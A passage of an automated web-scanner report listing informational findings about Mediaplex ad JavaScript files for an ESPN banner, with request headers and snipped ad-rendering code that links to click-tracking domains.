Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5268
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpqdsS.A2lYkJsTIi_4yzxnWTnFUC2afXcME.CTHHAPMwoAne4KpIPPVJp_Ux.jM7TbdezjLGbxDTKS826hMWflVmZReHEQryf6yI2orFa2_cD8T4bkA--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=38838003-8d0c-46bf-8cdb-8cb1a0f4dda1" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.35. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3Dc9c8c53b-79c3-4456-8038-d75a113385a1&mpt=c9c8c53b-79c3-4456-8038-d75a113385a1&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjLENgDAMBFdBromE83HisA2EMqKjQuzOu_o76exXANmX7rliXQSZ4oB6mFJk9OHDcKbWB1IpVpNv8HQ1O1QB50icRtwsby0s_nSucQtzYiHez5zESlSmVr8ftIAagg--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjLENgDAMBFdBromE83HisA2EMqKjQuzOu_o76exXANmX7rliXQSZ4oB6mFJk9OHDcKbWB1IpVpNv8HQ1O1QB50icRtwsby0s_nSucQtzYiHez5zESlSmVr8ftIAagg--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=c9c8c53b-79c3-4456-8038-d75a113385a1

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3Dc9c8c53b-79c3-4456-8038-d75a113385a1&mpt=c9c8c53b-79c3-4456-8038-d75a113385a1&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjLENgDAMBFdBromE83HisA2EMqKjQuzOu_o76exXANmX7rliXQSZ4oB6mFJk9OHDcKbWB1IpVpNv8HQ1O1QB50icRtwsby0s_nSucQtzYiHez5zESlSmVr8ftIAagg--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.news.com.au/breaking-news?useAbsoluteURL=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:24 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5252
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjLENgDAMBFdBromE83HisA2EMqKjQuzOu_o76exXANmX7rliXQSZ4oB6mFJk9OHDcKbWB1IpVpNv8HQ1O1QB50icRtwsby0s_nSucQtzYiHez5zESlSmVr8ftIAagg--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=c9c8c53b-79c3-4456-8038-d75a113385a1" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.36. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D61003919-a709-4694-bf7a-253bc3fd028d&mpt=61003919-a709-4694-bf7a-253bc3fd028d&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOxEAIQ68SUe9IgGcY2Nvko1RRuq1WuXug8nuS7T8B9F3C1fBZCJrigHiZpJAJM0KirZOjdYvetnOuTQe2HefB6gfVtMpzKM.y.onMkdkZntgT7991JVqiZHXY8wKtqRqp%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOxEAIQ68SUe9IgGcY2Nvko1RRuq1WuXug8nuS7T8B9F3C1fBZCJrigHiZpJAJM0KirZOjdYvetnOuTQe2HefB6gfVtMpzKM.y.onMkdkZntgT7991JVqiZHXY8wKtqRqp&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=61003919-a709-4694-bf7a-253bc3fd028d

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D61003919-a709-4694-bf7a-253bc3fd028d&mpt=61003919-a709-4694-bf7a-253bc3fd028d&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOxEAIQ68SUe9IgGcY2Nvko1RRuq1WuXug8nuS7T8B9F3C1fBZCJrigHiZpJAJM0KirZOjdYvetnOuTQe2HefB6gfVtMpzKM.y.onMkdkZntgT7991JVqiZHXY8wKtqRqp%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:27 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5268
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOxEAIQ68SUe9IgGcY2Nvko1RRuq1WuXug8nuS7T8B9F3C1fBZCJrigHiZpJAJM0KirZOjdYvetnOuTQe2HefB6gfVtMpzKM.y.onMkdkZntgT7991JVqiZHXY8wKtqRqp&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=61003919-a709-4694-bf7a-253bc3fd028d" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.37. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3Dcce39c61-ad20-4f44-8913-15cfe99aae44&mpt=cce39c61-ad20-4f44-8913-15cfe99aae44&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4By5Qdqb8xXGcKunUq.vdSE.8Akl8B5HmEt4HHIWgUB9TTlCJrbcQaWuar1WKXWfFQFO3r2hFzbjPJaZbP3uqZlj_B7EyrcKIR35_7Jg6istrH7w_2ZRtu%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4By5Qdqb8xXGcKunUq.vdSE.8Akl8B5HmEt4HHIWgUB9TTlCJrbcQaWuar1WKXWfFQFO3r2hFzbjPJaZbP3uqZlj_B7EyrcKIR35_7Jg6istrH7w_2ZRtu&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=cce39c61-ad20-4f44-8913-15cfe99aae44

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3Dcce39c61-ad20-4f44-8913-15cfe99aae44&mpt=cce39c61-ad20-4f44-8913-15cfe99aae44&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4By5Qdqb8xXGcKunUq.vdSE.8Akl8B5HmEt4HHIWgUB9TTlCJrbcQaWuar1WKXWfFQFO3r2hFzbjPJaZbP3uqZlj_B7EyrcKIR35_7Jg6istrH7w_2ZRtu%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:22 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5268
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4By5Qdqb8xXGcKunUq.vdSE.8Akl8B5HmEt4HHIWgUB9TTlCJrbcQaWuar1WKXWfFQFO3r2hFzbjPJaZbP3uqZlj_B7EyrcKIR35_7Jg6istrH7w_2ZRtu&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=cce39c61-ad20-4f44-8913-15cfe99aae44" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.38. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3Dc0e624ab-6f89-4ef0-aff7-5790116001f0&mpt=c0e624ab-6f89-4ef0-aff7-5790116001f0&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOhTAMQ6.CMlMpado05TaAyITYmNC_.3cmvyfZ_kiVtmV6NV0X0gpxVfE0gdDJl9W2H8XCZ2lXcNkjRuljsogxSzDlNMujVx5p.TORHdlYHdiAz3vfQAMKqt1.f937GwU-%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhTAMQ6.CMlMpado05TaAyITYmNC_.3cmvyfZ_kiVtmV6NV0X0gpxVfE0gdDJl9W2H8XCZ2lXcNkjRuljsogxSzDlNMujVx5p.TORHdlYHdiAz3vfQAMKqt1.f937GwU-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=c0e624ab-6f89-4ef0-aff7-5790116001f0

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3Dc0e624ab-6f89-4ef0-aff7-5790116001f0&mpt=c0e624ab-6f89-4ef0-aff7-5790116001f0&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOhTAMQ6.CMlMpado05TaAyITYmNC_.3cmvyfZ_kiVtmV6NV0X0gpxVfE0gdDJl9W2H8XCZ2lXcNkjRuljsogxSzDlNMujVx5p.TORHdlYHdiAz3vfQAMKqt1.f937GwU-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:27 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5268
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhTAMQ6.CMlMpado05TaAyITYmNC_.3cmvyfZ_kiVtmV6NV0X0gpxVfE0gdDJl9W2H8XCZ2lXcNkjRuljsogxSzDlNMujVx5p.TORHdlYHdiAz3vfQAMKqt1.f937GwU-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=c0e624ab-6f89-4ef0-aff7-5790116001f0" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.39. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3Daabded66-f1dd-43ff-8197-04882c0e5d5c&mpt=aabded66-f1dd-43ff-8197-04882c0e5d5c&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4By7Jkub9Jo3gKumUK.vdSE.8Akg.J0Hub3kxeG0mDuAh7GkNo3z9xhllZHFG6rFWc5yi1u7ejnhp6UE6zPLTVkZY_E6nIXsWBHfi9rwtoQEZV7fcHHRMb0Q--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4By7Jkub9Jo3gKumUK.vdSE.8Akg.J0Hub3kxeG0mDuAh7GkNo3z9xhllZHFG6rFWc5yi1u7ejnhp6UE6zPLTVkZY_E6nIXsWBHfi9rwtoQEZV7fcHHRMb0Q--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=aabded66-f1dd-43ff-8197-04882c0e5d5c

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3Daabded66-f1dd-43ff-8197-04882c0e5d5c&mpt=aabded66-f1dd-43ff-8197-04882c0e5d5c&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4By7Jkub9Jo3gKumUK.vdSE.8Akg.J0Hub3kxeG0mDuAh7GkNo3z9xhllZHFG6rFWc5yi1u7ejnhp6UE6zPLTVkZY_E6nIXsWBHfi9rwtoQEZV7fcHHRMb0Q--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:15 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5284
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4By7Jkub9Jo3gKumUK.vdSE.8Akg.J0Hub3kxeG0mDuAh7GkNo3z9xhllZHFG6rFWc5yi1u7ejnhp6UE6zPLTVkZY_E6nIXsWBHfi9rwtoQEZV7fcHHRMb0Q--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=aabded66-f1dd-43ff-8197-04882c0e5d5c" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.40. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D8d49e6c1-380c-415f-b329-2a66e8aee68e&mpt=8d49e6c1-380c-415f-b329-2a66e8aee68e&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4BS7QVub9JU3UKunUq.vdSE.8Akl8B5L6tMMdtExglAI0ypUg8x0o_tSH62YbOV3vAVrPDPePI9EipaZX3aX0vq5_FnMzREcRBfH.ui.hEZXX67w_kgBtK%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4BS7QVub9JU3UKunUq.vdSE.8Akl8B5L6tMMdtExglAI0ypUg8x0o_tSH62YbOV3vAVrPDPePI9EipaZX3aX0vq5_FnMzREcRBfH.ui.hEZXX67w_kgBtK&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=8d49e6c1-380c-415f-b329-2a66e8aee68e

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D8d49e6c1-380c-415f-b329-2a66e8aee68e&mpt=8d49e6c1-380c-415f-b329-2a66e8aee68e&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4BS7QVub9JU3UKunUq.vdSE.8Akl8B5L6tMMdtExglAI0ypUg8x0o_tSH62YbOV3vAVrPDPePI9EipaZX3aX0vq5_FnMzREcRBfH.ui.hEZXX67w_kgBtK%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.6520654342602938&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:54 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5268
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4BS7QVub9JU3UKunUq.vdSE.8Akl8B5L6tMMdtExglAI0ypUg8x0o_tSH62YbOV3vAVrPDPePI9EipaZX3aX0vq5_FnMzREcRBfH.ui.hEZXX67w_kgBtK&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=8d49e6c1-380c-415f-b329-2a66e8aee68e" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

14.41. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3D7f3f67d3-25f5-4bcc-b0ae-8f1a42f3638f&mpt=7f3f67d3-25f5-4bcc-b0ae-8f1a42f3638f&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDEOwzAMA78SaK4BS5Rtpb9J0moKsmUq.vfSnXgHkPwIIM9lDet4LAKjBKDhNKXISGQfLxRr2Yrvx1H2ur1LpG5uiY5ImdN_uVkd0.bPymxMrwiiE6_7PImdqKw2_f4ABIsbnA--%26redirectURL%3D

The response contains the following link to another domain:

http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDEOwzAMA78SaK4BS5Rtpb9J0moKsmUq.vfSnXgHkPwIIM9lDet4LAKjBKDhNKXISGQfLxRr2Yrvx1H2ur1LpG5uiY5ImdN_uVkd0.bPymxMrwiiE6_7PImdqKw2_f4ABIsbnA--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=7f3f67d3-25f5-4bcc-b0ae-8f1a42f3638f

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3D7f3f67d3-25f5-4bcc-b0ae-8f1a42f3638f&mpt=7f3f67d3-25f5-4bcc-b0ae-8f1a42f3638f&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDEOwzAMA78SaK4BS5Rtpb9J0moKsmUq.vfSnXgHkPwIIM9lDet4LAKjBKDhNKXISGQfLxRr2Yrvx1H2ur1LpG5uiY5ImdN_uVkd0.bPymxMrwiiE6_7PImdqKw2_f4ABIsbnA--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:20:01 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5274
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
